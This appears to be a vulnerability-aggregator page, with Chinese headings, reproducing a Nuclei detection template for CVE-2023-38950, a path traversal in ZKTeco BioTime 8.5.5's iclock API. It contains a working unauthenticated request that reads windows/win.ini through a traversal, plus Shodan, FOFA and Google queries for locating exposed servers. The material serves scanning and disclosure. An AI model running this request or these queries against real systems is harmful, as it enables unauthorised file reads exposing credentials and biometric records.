CVE-2023-38950: ZKTeco BioTime v8.5.5 - Path Traversal

日期: 2025-08-01 | 影响软件: ZKTeco BioTime | POC: 已公开

漏洞描述

A path traversal vulnerability in the iclock API of ZKTeco BioTime v8.5.5 allows unauthenticated attackers to read arbitrary files via supplying a crafted payload.

PoC代码[已公开]

id: CVE-2023-38950

info:
  name: ZKTeco BioTime v8.5.5 - Path Traversal
  author: iamnoooob,pdresearch
  severity: high
  description: |
    A path traversal vulnerability in the iclock API of ZKTeco BioTime v8.5.5 allows unauthenticated attackers to read arbitrary files via supplying a crafted payload.
  impact: |
    Unauthenticated attackers can read arbitrary files from the server through path traversal in the iclock API url parameter, potentially exposing employee biometric data, attendance records, and system credentials.
  remediation: |
    Update ZKTeco BioTime to a version newer than 8.5.5 that validates file paths in the iclock API and restricts access to authorized files only.
  reference:
    - https://github.com/advisories/GHSA-4m8x-4g54-h49v
    - http://zkteco.com
    - https://claroty.com/team82/disclosure-dashboard/cve-2023-38950
    - https://www.fortinet.com/content/dam/fortinet/assets/reports/report-incident-response-middle-east.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38950
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-38950
    cwe-id: CWE-22
    epss-score: 0.80791
    epss-percentile: 0.99104
    cpe: cpe:2.3:a:zkteco:biotime:8.5.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zkteco
    product: biotime
    shodan-query: http.title:"biotime"
    fofa-query: title="biotime"
    google-query: intitle:"biotime"
  tags: cve,cve2023,zkteco,biotime,lfr,kev,vkev,vuln

http:
  - raw:
      - |
        GET /iclock/file?url=/../../../../../../../../../windows/win.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/plain")'
          - 'contains_all(base64_decode(body), "; for 16-bit app support" ,"[extensions]")'
        condition: and
# digest: 4a0a00473045022007a85d4cf852ab1859a1d4d0dfd24595d9213a3ad5774c5f8e9f5d9c7c72c2c3022100f594631cbc9ab149afa03a671473da8d750d9f7708221b80b57d91eb862c5ddc:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-38950.yaml

相关漏洞推荐